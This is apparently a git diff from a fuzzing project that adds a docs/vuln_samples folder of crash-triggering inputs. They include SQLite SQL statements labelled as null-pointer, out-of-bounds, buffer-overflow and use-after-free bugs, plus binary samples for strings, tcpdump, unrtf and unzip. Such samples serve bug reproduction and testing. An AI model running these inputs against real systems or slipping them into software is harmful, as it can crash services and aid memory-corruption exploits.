+SELECT*from(select"",zeroblob(0),zeroblob(1E9),zeroblob(0),zeroblob(150000000),zeroblob(0),zeroblob(0),zeroblob(0),zeroblob(0),zeroblob(1E9),zeroblob(0),zeroblob(0),zeroblob(0),zeroblob(0),zeroblob(0)),(select"",zeroblob(1E9),zeroblob(0),zeroblob(0),zeroblob(0),zeroblob(0),zeroblob(0),zeroblob(0),zeroblob(1E9),(0),zeroblob(150000000),(0),zeroblob(0),(0)EXCEPT select zeroblob(0),zeroblob(0),zeroblob(0),zeroblob(0),zeroblob(0),zeroblob(0),(0),zeroblob(0),zeroblob(0),zeroblob(0),zeroblob(0),zeroblob(0),zeroblob(0),zeroblob(0));
diff --git a/docs/vuln_samples/sqlite-null-ptr1.sql b/docs/vuln_samples/sqlite-null-ptr1.sql
new file mode 100644
index 00000000..3f9d46c7
--- /dev/null
+++ b/docs/vuln_samples/sqlite-null-ptr1.sql
@@ -0,0 +1,2 @@
+create table t0(t);insert into t0
+select strftime();
diff --git a/docs/vuln_samples/sqlite-null-ptr10.sql b/docs/vuln_samples/sqlite-null-ptr10.sql
new file mode 100644
index 00000000..798bbf14
--- /dev/null
+++ b/docs/vuln_samples/sqlite-null-ptr10.sql
@@ -0,0 +1 @@
+SELECT fts3_tokenizer(@0());
diff --git a/docs/vuln_samples/sqlite-null-ptr11.sql b/docs/vuln_samples/sqlite-null-ptr11.sql
new file mode 100644
index 00000000..f6bcf65f
--- /dev/null
+++ b/docs/vuln_samples/sqlite-null-ptr11.sql
@@ -0,0 +1 @@
+select''like''like''like#0;
diff --git a/docs/vuln_samples/sqlite-null-ptr12.sql b/docs/vuln_samples/sqlite-null-ptr12.sql
new file mode 100644
index 00000000..8d14a86b
--- /dev/null
+++ b/docs/vuln_samples/sqlite-null-ptr12.sql
@@ -0,0 +1 @@
+PRAGMA e;select lower(0);select lower(0)"a",""GROUP BY a ORDER BY a;
diff --git a/docs/vuln_samples/sqlite-null-ptr13.sql b/docs/vuln_samples/sqlite-null-ptr13.sql
new file mode 100644
index 00000000..e730db32
--- /dev/null
+++ b/docs/vuln_samples/sqlite-null-ptr13.sql
@@ -0,0 +1 @@
+WITH x AS(SELECT*FROM t)SELECT""EXCEPT SELECT 0 ORDER BY 0 COLLATE"";
diff --git a/docs/vuln_samples/sqlite-null-ptr14.sql b/docs/vuln_samples/sqlite-null-ptr14.sql
new file mode 100644
index 00000000..37b9baed
--- /dev/null
+++ b/docs/vuln_samples/sqlite-null-ptr14.sql
@@ -0,0 +1 @@
+CREATE VIRTUAL TABLE x USING fts4();VALUES(0,0),(0,0),(0,0),(0,0);PRAGMA writable_schema=ON;UPDATE sqlite_master SET sql=''WHERE name='';UPDATE sqlite_master SET sql='CREATE table t(d CHECK(T(#0)';SAVEPOINT K;SAVEPOINT T;SAVEPOINT T;ANALYZE;ROLLBACK;SAVEPOINT E;DROP TABLE IF EXISTS t;
diff --git a/docs/vuln_samples/sqlite-null-ptr15.sql b/docs/vuln_samples/sqlite-null-ptr15.sql
new file mode 100644
index 00000000..83d5c9d1
--- /dev/null
+++ b/docs/vuln_samples/sqlite-null-ptr15.sql
@@ -0,0 +1 @@
+CREATE VIRTUAL TABLE t4 USING fts4(0,b,c,notindexed=0);INSERT INTO t4 VALUES('','','0');BEGIN;INSERT INTO t4 VALUES('','','0');INSERT INTO t4(t4)VALUES('integrity-check');
diff --git a/docs/vuln_samples/sqlite-null-ptr2.sql b/docs/vuln_samples/sqlite-null-ptr2.sql
new file mode 100644
index 00000000..11c5a378
--- /dev/null
+++ b/docs/vuln_samples/sqlite-null-ptr2.sql
@@ -0,0 +1 @@
+DETACH(select group_concat(q));
diff --git a/docs/vuln_samples/sqlite-null-ptr3.sql b/docs/vuln_samples/sqlite-null-ptr3.sql
new file mode 100644
index 00000000..14df82a7
--- /dev/null
+++ b/docs/vuln_samples/sqlite-null-ptr3.sql
@@ -0,0 +1 @@
+select(select strftime());
diff --git a/docs/vuln_samples/sqlite-null-ptr4.sql b/docs/vuln_samples/sqlite-null-ptr4.sql
new file mode 100644
index 00000000..fdb80476
--- /dev/null
+++ b/docs/vuln_samples/sqlite-null-ptr4.sql
@@ -0,0 +1 @@
+select n()AND+#00;
diff --git a/docs/vuln_samples/sqlite-null-ptr5.sql b/docs/vuln_samples/sqlite-null-ptr5.sql
new file mode 100644
index 00000000..7bbb7856
--- /dev/null
+++ b/docs/vuln_samples/sqlite-null-ptr5.sql
@@ -0,0 +1 @@
+select e.*,0 from(s,(L))e;
diff --git a/docs/vuln_samples/sqlite-null-ptr6.sql b/docs/vuln_samples/sqlite-null-ptr6.sql
new file mode 100644
index 00000000..2eb04bc4
--- /dev/null
+++ b/docs/vuln_samples/sqlite-null-ptr6.sql
@@ -0,0 +1 @@
+PRAGMA encoding='UTF16';CREATE VIRTUAL TABLE È USING s;
\ No newline at end of file
diff --git a/docs/vuln_samples/sqlite-null-ptr7.sql b/docs/vuln_samples/sqlite-null-ptr7.sql
new file mode 100644
index 00000000..57ab12c5
--- /dev/null
+++ b/docs/vuln_samples/sqlite-null-ptr7.sql
@@ -0,0 +1 @@
+CREATE VIRTUAL TABLE t USING fts4(tokenize=);
diff --git a/docs/vuln_samples/sqlite-null-ptr8.sql b/docs/vuln_samples/sqlite-null-ptr8.sql
new file mode 100644
index 00000000..4d5db064
--- /dev/null
+++ b/docs/vuln_samples/sqlite-null-ptr8.sql
@@ -0,0 +1 @@
+CREATE TABLE p(a UNIQUE,PRIMARY KEY('a'))WITHOUT rowid;
diff --git a/docs/vuln_samples/sqlite-null-ptr9.sql b/docs/vuln_samples/sqlite-null-ptr9.sql
new file mode 100644
index 00000000..0ae836a2
--- /dev/null
+++ b/docs/vuln_samples/sqlite-null-ptr9.sql
@@ -0,0 +1 @@
+CREATE TABLE t0(z);WITH d(x)AS(SELECT*UNION SELECT 0)INSERT INTO t0 SELECT 0 FROM d;
diff --git a/docs/vuln_samples/sqlite-oob-read.sql b/docs/vuln_samples/sqlite-oob-read.sql
new file mode 100644
index 00000000..4fe53b4f
--- /dev/null
+++ b/docs/vuln_samples/sqlite-oob-read.sql
@@ -0,0 +1 @@
+create table t0(‰ DEFAULT(0=0)NOT/**/NULL);REPLACE into t0 select'';
\ No newline at end of file
diff --git a/docs/vuln_samples/sqlite-oob-write.sql b/docs/vuln_samples/sqlite-oob-write.sql
new file mode 100644
index 00000000..9b2c427d
--- /dev/null
+++ b/docs/vuln_samples/sqlite-oob-write.sql
@@ -0,0 +1,6 @@
+CREATE VIRTUAL TABLE t0 USING fts4(x,order=DESC);
+INSERT INTO t0(docid,x)VALUES(-1E0,'0(o');
+INSERT INTO t0 VALUES('');
+INSERT INTO t0 VALUES('');
+INSeRT INTO t0 VALUES('o');
+SELECT docid FROM t0 WHERE t0 MATCH'"0*o"';
diff --git a/docs/vuln_samples/sqlite-stack-buf-overflow.sql b/docs/vuln_samples/sqlite-stack-buf-overflow.sql
new file mode 100644
index 00000000..4be57fd0
--- /dev/null
+++ b/docs/vuln_samples/sqlite-stack-buf-overflow.sql
@@ -0,0 +1 @@
+SELECT printf('%*.*f',90000||006000000&6600000000,00000000000000000909000000000000.0000000000000000)""WHERE"">"";
diff --git a/docs/vuln_samples/sqlite-stack-exhaustion.sql b/docs/vuln_samples/sqlite-stack-exhaustion.sql
new file mode 100644
index 00000000..6031a93b
--- /dev/null
+++ b/docs/vuln_samples/sqlite-stack-exhaustion.sql
@@ -0,0 +1 @@
+CREATE VIRTUAL TABLE t0 USING fts4(content=t0);
diff --git a/docs/vuln_samples/sqlite-unint-mem.sql b/docs/vuln_samples/sqlite-unint-mem.sql
new file mode 100644
index 00000000..83b77112
--- /dev/null
+++ b/docs/vuln_samples/sqlite-unint-mem.sql
@@ -0,0 +1 @@
+REATE VIRTUAL TABLE t0 USING fts4(prefix=0);INSERT INTO t0 VALUES(0);
diff --git a/docs/vuln_samples/sqlite-use-after-free.sql b/docs/vuln_samples/sqlite-use-after-free.sql
new file mode 100644
index 00000000..4083ee64
--- /dev/null
+++ b/docs/vuln_samples/sqlite-use-after-free.sql
@@ -0,0 +1 @@
+create table t(s);PRAGMA writable_schema=ON;UPDATE sqlite_master SET sql='ANALYZE;CREATE VIRTUAL TABLE t USING fts3;DROP TABLE t;DROP TABLE EXISTS t';PRAGMA r;SAVEPOINT T;ANALYZE;ROLLBACK;SAVEPOINT E;DROP TABLE IF EXISTS t;
diff --git a/docs/vuln_samples/strings-bfd-badptr.elf b/docs/vuln_samples/strings-bfd-badptr.elf
new file mode 100644
index 00000000..1df629b6
Binary files /dev/null and b/docs/vuln_samples/strings-bfd-badptr.elf differ
diff --git a/docs/vuln_samples/strings-bfd-badptr2.elf b/docs/vuln_samples/strings-bfd-badptr2.elf
new file mode 100644
index 00000000..085d3c11
Binary files /dev/null and b/docs/vuln_samples/strings-bfd-badptr2.elf differ
diff --git a/docs/vuln_samples/strings-stack-overflow b/docs/vuln_samples/strings-stack-overflow
new file mode 100644
index 00000000..a673b273
--- /dev/null
+++ b/docs/vuln_samples/strings-stack-overflow
@@ -0,0 +1,3 @@
+$$@$$$@$o
+S…Ôo
+S…Ô
\ No newline at end of file
diff --git a/docs/vuln_samples/strings-unchecked-ctr.elf b/docs/vuln_samples/strings-unchecked-ctr.elf
new file mode 100644
index 00000000..dc531d5c
Binary files /dev/null and b/docs/vuln_samples/strings-unchecked-ctr.elf differ
diff --git a/docs/vuln_samples/tcpdump-arp-crash.pcap b/docs/vuln_samples/tcpdump-arp-crash.pcap
new file mode 100644
index 00000000..40d199a2
Binary files /dev/null and b/docs/vuln_samples/tcpdump-arp-crash.pcap differ
diff --git a/docs/vuln_samples/tcpdump-ppp-crash.pcap b/docs/vuln_samples/tcpdump-ppp-crash.pcap
new file mode 100644
index 00000000..b6831155
Binary files /dev/null and b/docs/vuln_samples/tcpdump-ppp-crash.pcap differ
diff --git a/docs/vuln_samples/unrtf-arbitrary-read.rtf b/docs/vuln_samples/unrtf-arbitrary-read.rtf
new file mode 100644
index 00000000..b7f4c283
Binary files /dev/null and b/docs/vuln_samples/unrtf-arbitrary-read.rtf differ
diff --git a/docs/vuln_samples/unzip-t-mem-corruption.zip b/docs/vuln_samples/unzip-t-mem-corruption.zip
new file mode 100644
index 00000000..d34fa39e
Binary files /dev/null and b/docs/vuln_samples/unzip-t-mem-corruption.zip differ
-- 
cgit 1.4.1